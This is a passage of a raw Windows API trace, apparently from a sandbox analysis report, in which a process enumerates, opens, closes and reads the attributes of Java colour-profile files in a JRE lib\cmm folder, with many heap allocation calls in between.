InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.666] AreFileApisANSI () returned 1 [0094.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75c60 [0094.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75c60, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 53 [0094.666] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.666] GetFileType (hFile=0x368) returned 0x1 [0094.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0094.667] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.667] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.667] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.667] CloseHandle (hObject=0x368) returned 1 [0094.667] AreFileApisANSI () returned 1 [0094.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0094.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 53 [0094.667] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.667] GetFileType (hFile=0x368) returned 0x1 [0094.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0094.668] CloseHandle (hObject=0x368) returned 1 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.669] AreFileApisANSI () returned 1 [0094.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75d50 [0094.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf") returned 53 [0094.669] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\ciexyz.pf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc824)) returned 1 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.669] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x278, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="GRAY.pf", cAlternateFileName="")) returned 1 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8afe0 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0094.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0094.669] AreFileApisANSI () returned 1 [0094.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf", lpUsedDefaultChar=0x0) returned 51 [0094.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0094.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.670] AreFileApisANSI () returned 1 [0094.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46908 [0094.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 51 [0094.670] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.670] GetFileType (hFile=0x368) returned 0x1 [0094.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0094.670] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.670] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.671] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.671] CloseHandle (hObject=0x368) returned 1 [0094.671] AreFileApisANSI () returned 1 [0094.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46048 [0094.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 51 [0094.671] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.671] GetFileType (hFile=0x368) returned 0x1 [0094.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0094.671] CloseHandle (hObject=0x368) returned 1 [0094.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.672] AreFileApisANSI () returned 1 [0094.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46048 [0094.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 51 [0094.672] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x278)) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0094.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.672] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x414, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LINEAR_RGB.pf", cAlternateFileName="LINEAR~1.PF")) returned 1 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.672] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a530 [0094.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0094.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0094.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0094.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0094.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.673] AreFileApisANSI () returned 1 [0094.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf", lpUsedDefaultChar=0x0) returned 57 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0094.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.673] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.673] AreFileApisANSI () returned 1 [0094.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0094.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0094.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf") returned 57 [0094.673] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.674] GetFileType (hFile=0x368) returned 0x1 [0094.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.674] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.674] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.674] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.675] CloseHandle (hObject=0x368) returned 1 [0094.675] AreFileApisANSI () returned 1 [0094.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0094.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0094.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x69bb0, 